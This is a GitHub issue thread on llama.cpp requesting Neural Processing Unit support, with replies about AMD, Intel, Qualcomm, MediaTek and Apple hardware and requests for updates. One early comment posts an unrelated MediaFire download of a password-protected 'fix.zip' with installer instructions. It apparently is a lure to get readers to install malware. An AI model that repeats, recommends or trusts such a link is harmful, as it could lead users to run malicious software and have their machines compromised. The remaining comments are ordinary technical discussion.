### ISSUE TITLE
Feature Request: NPU Support

### ISSUE THREAD

**Issue by gformcreation** [ggerganov/llama.cpp#9181]
### Prerequisites

- [X] I am running the latest code. Mention the version if possible as well.
- [X] I carefully followed the [README.md](https://github.com/ggerganov/llama.cpp/blob/master/README.md).
- [X] I searched using keywords relevant to my issue to make sure that I am creating a new issue that is not already open (or closed).
- [X] I reviewed the [Discussions](https://github.com/ggerganov/llama.cpp/discussions), and have a new and useful enhancement to share.

### Feature Description

First, thank you for your incredible work on this project! To enhance its performance, especially on mobile devices and NPU-enabled PCs like those with Copilot+, I would love to see support for Neural Processing Units (NPUs). 

### Motivation

Integrating NPU support would significantly improve the speed and efficiency of AI tasks, offering users a smoother and more responsive experience in terms of quick response generation.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by piDack** [comment]
AMD’s NPU has an implementation in this [repository](https://github.com/amd/RyzenAI-SW/tree/main/example/transformers/ext/llama.cpp), but its performance is poor. I’ve done some exploration, but I couldn’t even pass the unit tests for basic op, so I believe that support for AMD’s NPU might take a long time, unless AMD deems it worth the effort.

**Comment by hgftrdw45ud67is8o89** [comment]
volunteer to test intel AI boost (NPU) here.

**Comment by hpvd** [comment]
Qualcomms NPU is Hexagon, see https://github.com/ggerganov/llama.cpp/issues/2687

**Comment by FranzKafkaYu** [comment]
can we support more NPU liked devices like MediaTek APU(AI Processing Unit),its development kit named NeuroPilot SDK,[link](https://neuropilot.mediatek.com/)

**Comment by themoneyevo** [comment]
any update？

**Comment by trigger2k20** [comment]
What about Apple Silicon NPU ?

**Comment by MovGP0** [comment]
> @trigger2k20 
> What about Apple Silicon NPU ?

To my knowledge, the [Metal SDK](https://developer.apple.com/documentation/metal) is already supported by `llama.cpp`.

You can find the source here: [ggml-metal](https://github.com/ggerganov/llama.cpp/tree/master/ggml/src/ggml-metal)

**Comment by trigger2k20** [comment]
Well on the Metal SDK Link you provided, i read & see only GPU.
Search says it only supports GPU, [Core ML](https://developer.apple.com/documentation/coreml/) supports NPU. 

Any Knowledge if Core ML is supported ?

**Comment by lingsongfeng** [comment]
NPU support will be achieved by supporting DirectML. see #7772

**Comment by BleedingDev** [comment]
Is there any update? Would like to test it on Windows Devkit 2023 with NPU. :)

**Comment by GabrielVander** [comment]
Any updates?
